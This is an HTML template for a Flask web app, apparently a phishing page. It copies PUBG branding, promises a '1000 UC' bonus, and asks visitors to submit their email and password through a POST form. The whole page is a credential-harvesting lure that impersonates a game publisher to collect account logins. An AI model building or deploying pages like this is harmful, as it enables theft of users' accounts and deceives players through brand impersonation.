<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <title>PUBG Bonus Registration</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
    <div class="container">
        <img src="/static/PUBGBATTLEGROUNDS.svg" alt="img">
        <h1>PUBG Bonus</h1>
        <h1>Registration for BONUS</h1>
        <h2>Бонус равен 1000 UC (Unknown Cash)</h2>

        <form method="POST">
            <input type="email" name="email" placeholder="Введите email" required>
            <input type="password" name="password" placeholder="Введите пароль" required>
            <button type="submit">Отправить</button>
        </form>
    </div>
</body>
</html>
